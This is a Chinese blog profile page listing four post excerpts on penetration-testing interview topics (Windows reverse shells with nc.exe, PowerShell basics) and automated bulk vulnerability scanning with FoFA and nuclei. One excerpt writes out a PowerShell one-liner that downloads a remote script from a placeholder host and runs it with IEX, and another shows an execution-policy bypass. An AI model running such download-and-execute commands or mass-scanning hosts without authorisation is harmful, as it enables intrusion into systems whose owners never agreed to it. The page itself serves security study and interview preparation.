- 博客(4)
- 收藏
- 关注
RSS订阅原创 渗透测试面试常问-Windows 反弹shell有哪些方式
Windows不自带nc所以一般要通过上传nc.exe来实现。NC正向shellNC反向shell。
2024-11-19 00:38:16
1601
原创 24小时自动化漏洞扫描工具kuki_scan 2.0
kuki_scan是一款利用了nuclei和fofamap联动的想法,写的一个以vps为平台的漏扫工具,最大的亮点是可以做到24小时自动化漏扫,并将漏洞结果发到邮箱里,可以做到简单的一条语句24小时自动化扫描的效果。多用于批量捡洞、刷排名。kuki_scan 2.0 版本基于kuki_scan更新了将最新漏洞结果发到邮箱的功能。
2024-11-16 04:24:33
219
原创 渗透面试常问——Powershell简单了解
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a.ps1')" #远程下载并通过IEX执行脚本。Powershell是微软开发的命令行shell和脚本语言,它基于.Net框架,专门为--系统管理--和配置任务设计。Powershell本地执行脚本:powershell -f test.ps1 或 powershell -ep bypass -f test.ps1。上面的内容面试中给容易问到。
2024-11-15 18:39:27
612
原创 FoFA联动nuclei的自动化漏扫工具
nuclei: 去官方下载nuclei,这里我只讲单文件版本配置方式,github的nuclei官方项目:nuclei 进入release,选择适合自己的版本,这里我是用amd64的,解压出来然后使用chmod u+x nuclei给予执行权限,然后mv nculei环境变量目录(输入环境变量就可以在任何目录执行该程序),就可以直接使用了image.png。这是一个结合fofa和nuclei的批量化扫描脚本,能够根据给出的关键词进行批量化扫描,适合放在linux服务器上,可以实现24小时自动扫描。
2024-05-19 09:40:28
2039
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人